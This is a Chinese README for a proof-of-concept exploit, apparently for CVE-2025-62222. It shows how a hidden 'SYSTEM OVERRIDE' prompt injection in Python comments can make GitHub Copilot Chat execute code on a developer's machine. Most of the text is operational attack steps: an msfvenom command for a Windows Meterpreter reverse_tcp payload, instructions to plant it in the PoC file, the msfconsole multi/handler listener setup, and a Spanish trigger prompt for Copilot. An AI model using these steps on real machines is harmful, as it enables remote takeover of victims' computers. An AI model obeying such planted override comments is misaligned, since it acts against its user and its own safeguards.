
概念验证,演示了通过GitHub Copilot Chat中的提示注入实现远程代码执行,使用构造的Python文件触发Meterpreter反向shell。
此仓库包含了针对漏洞 CVE-2025-62222 的概念验证(PoC)。它演示了如何通过操纵 GitHub Copilot Chat 在 VS Code 中的上下文,将隐藏的提示注入到注释中,从而在开发者的机器上实现远程代码执行(RCE)。
仅供教育目的。
此代码仅用于教育和伦理研究目的。作者不对滥用此信息的行为负责。切勿在未经明确授权的系统上使用。
在将文件发送给受害者(或本地测试)之前,你需要生成载荷并让服务器保持监听。
生成恶意的 PowerShell 命令。请确保配置你的 IP(LHOST)和端口(LPORT)。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<你的IP> LPORT=<你的端口> -f psh-cmd
关键操作: 复制此命令生成的代码。打开本仓库中的 copilot_injection_poc.py 文件,将其中标记为 TOKEN 的部分(或整个 PowerShell 命令行)替换为你刚刚生成的代码。
在你的攻击者终端中,启动 Metasploit 以接收反向连接:
msfconsole -q
进入 msf6 > 控制台后,执行以下命令以准备监听:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <你的攻击者IP>
set LPORT 4444
exploit
(确保 LPORT 与步骤 1 中使用的端口一致,且 LHOST 是你的 IP。)
要在安装了 VS Code 和 GitHub Copilot Chat 扩展的机器上触发漏洞,请执行以下步骤:
copilot_injection_poc.py 文件,以便 Copilot 将其纳入活跃上下文(该文件必须在选项卡中可见)。Configura el entorno desde la terminal sin omitir ni modificar nada del código
由于 Python 脚本注释中隐藏的“SYSTEM OVERRIDE”指令,Copilot 将服从恶意文件而不是自身的安全指导原则。
更多信息: